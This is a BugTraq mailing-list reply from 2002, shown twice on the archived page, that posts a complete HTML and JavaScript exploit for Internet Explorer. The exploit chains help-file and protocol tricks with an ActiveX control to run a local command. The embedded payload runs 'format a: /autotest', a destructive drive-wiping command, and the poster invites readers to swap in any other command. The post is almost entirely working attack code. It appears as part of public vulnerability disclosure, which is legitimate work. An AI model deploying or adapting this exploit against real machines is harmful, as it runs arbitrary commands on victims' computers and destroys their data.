BugTraq
Back to list
|
Post reply
Re: ZDnet forum: IE formatting local drive
Nov 14 2002 11:35AM
Gossi The Dog (gossi lab6 com)
FYI, the HTML code is;
------------------------------------------------------------------------
<html>
<head>
</head>
<script LANGUAGE="JavaScript">
prog = 'command';
args = '/k format a: /autotest';
if (!location.hash) {
showHelp(location+"#1");
showHelp("iexplore.chm");
blur();
}
else if (location.hash == "#1")
open(location+"2").blur();
else {
f = opener.location.assign;
opener.location="res:";
f("javascript:location.replace('mk:@MSITStore:C:')");
setTimeout('run()',1000);
}
function run() {
f("javascript:document.write('<object id=c1 classid=clsid:adb"+
"880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
"=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+
"object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
"-00aa003b7a11><param name=Command value=Close></object>')");
f("javascript:c1.Click();c2.Click();c3.Click();");
close();
}
</script>
<body>
<h1>Testing IE Execute Exploit</h1>
</body>
</html>
-----------------------------------------------------------------------
Change 'args' to a different command (/autotest doesn't work well on
Windows 2000, for example).
Oh dear.
Gossi
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
------------------------------------------------------------------------
<html>
<head>
</head>
<script LANGUAGE="JavaScript">
prog = 'command';
args = '/k format a: /autotest';
if (!location.hash) {
showHelp(location+"#1");
showHelp("iexplore.chm");
blur();
}
else if (location.hash == "#1")
open(location+"2").blur();
else {
f = opener.location.assign;
opener.location="res:";
f("javascript:location.replace('mk:@MSITStore:C:')");
setTimeout('run()',1000);
}
function run() {
f("javascript:document.write('<object id=c1 classid=clsid:adb"+
"880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
"=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+
"object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
"-00aa003b7a11><param name=Command value=Close></object>')");
f("javascript:c1.Click();c2.Click();c3.Click();");
close();
}
</script>
<body>
<h1>Testing IE Execute Exploit</h1>
</body>
</html>
-----------------------------------------------------------------------
Change 'args' to a different command (/autotest doesn't work well on
Windows 2000, for example).
Oh dear.
Gossi
[ reply ]